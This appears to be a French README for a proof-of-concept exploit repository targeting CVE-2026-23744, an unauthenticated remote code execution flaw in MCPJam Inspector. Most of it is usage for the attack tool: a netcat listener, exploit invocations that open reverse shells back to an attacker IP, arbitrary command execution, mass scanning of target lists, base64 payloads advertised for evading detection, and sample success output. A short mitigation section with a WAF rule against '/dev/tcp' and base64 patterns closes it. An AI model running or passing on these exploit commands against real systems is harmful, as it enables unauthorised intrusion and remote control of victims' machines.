
Une preuve de concept d'exploitation pour CVE-2026-23744 - vulnérabilité d'exécution de code à distance (RCE) dans MCPJam Inspector. Cet outil démontre la faille de sécurité dans les versions <=1.4.2 et aide les chercheurs en sécurité à vérifier les correctifs. Uniquement à des fins de tests autorisés et d'éducation. Inclut plusieurs options de payload, l'exécution de commandes et la gestion de session.
Cet outil est destiné UNIQUEMENT aux tests de sécurité autorisés et à des fins éducatives. Toute utilisation non autorisée est illégale. Les utilisateurs assument l'entière responsabilité de leurs actions.
Ce dépôt contient un exploit de proof-of-concept pour CVE-2026-23744, une vulnérabilité d'exécution de code à distance (RCE) non authentifiée trouvée dans les versions <=1.4.2 de MCPJam Inspector. La vulnérabilité a un score CVSS critique de 9,8, indiquant un risque sévère avec un vecteur d'attaque réseau.
| Attribut | Détails |
|---|---|
| CVE ID | CVE-2026-23744 |
| Vulnérabilité | Exécution de code à distance non authentifiée |
| Versions affectées | <=1.4.2 |
| Score CVSS | 9,8 (Critique) |
| Vecteur d'attaque | Réseau |

L'outil d'exploit offre un ensemble complet de fonctionnalités conçues pour des tests de sécurité efficaces :
Pour configurer l'outil d'exploit, suivez ces étapes :
Clonez le dépôt :
git clone https://github.com/CerberusMrXi/CVE-2026-23744-MCPJam-RCE-Exploit.git
cd CVE-2026-23744-MCPJam-RCE-Exploit
Installez les dépendances :
pip install -r requirements.txt
Pour lancer un exploit de base, configurez d'abord un écouteur, puis exécutez le script d'exploit :
# Start listener
nc -lvnp 4444
# Run exploit
python exploit.py -u http://target-ip:8080 -l attacker-ip -p 4444
Exécutez des commandes uniques ou des commandes depuis un fichier :
# Execute single command
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -c "id; whoami"
# Execute commands from file
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -C commands.txt
Utilisez différents types de charges utiles pour différents scénarios :
# Python reverse shell
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t python
# Netcat reverse shell
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t nc
# Base64 encoded payload
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t base64
Scannez plusieurs cibles pour détecter la vulnérabilité :
# Create targets file
echo "http://192.168.1.10:8080" > targets.txt
echo "http://192.168.1.11:8080" >> targets.txt
# Scan for vulnerable targets
python exploit.py -f targets.txt -l 10.0.0.5 -p 4444 --scan
Explorez les fonctionnalités avancées telles que l'empreinte, l'utilisation de proxy, le mode verbeux et la configuration automatique de l'écouteur :
# With fingerprinting
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --fingerprint
# With proxy
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --proxy http://127.0.0.1:8080
# Verbose mode
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -v
# Auto-listener
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --listen
| Type | Commande | Idéal pour |
|---|---|---|
bash | Bash reverse shell | La plupart des systèmes Linux |
python | Python3 reverse shell | Systèmes avec Python installé |
nc | Netcat reverse shell | Systèmes avec netcat |
perl | Perl reverse shell | Systèmes avec Perl installé |
php | PHP reverse shell | Systèmes avec PHP installé |
base64 | Base64 encoded | Éviter la détection |
[+] Starting enhanced exploit against http://192.168.1.100:8080
[+] Reverse shell to 10.0.0.5:4444
[*] Session ID: AbCdEfGh
[*] Fingerprinting target...
[+] Target OS: Ubuntu
[+] Available capabilities: python3, perl, nc
[*] Executing exploit...
[+] Exploit successful!
[!] Check your netcat listener on 10.0.0.5:4444
Pour se protéger contre CVE-2026-23744, il est crucial de prendre les mesures immédiates suivantes :
POST suspectes vers /api/mcp/connect.Exemple de règle Nginx WAF pour bloquer les schémas malveillants courants :
location /api/mcp/connect {
if ($request_body ~* "bash.*/dev/tcp") { return 403; }
if ($request_body ~* "base64.*-d") { return 403; }
proxy_pass http://backend;
}
Q : Est-ce légal à utiliser ?
R : Cet outil n'est légal que sur les systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite de tester.
Q : Quels systèmes sont vulnérables ?
R : Les versions <=1.4.2 de MCPJam Inspector sont vulnérables.
Q : Comment protéger mes systèmes ?
R : Mettez à niveau immédiatement vers la version >1.4.2 de MCPJam Inspector.
Sudeepa Wanigarathna
L'utilisation non autorisée de cet outil est illégale et peut entraîner de graves conséquences, notamment :
Fait avec ❤️ par Sudeepa Wanigarathna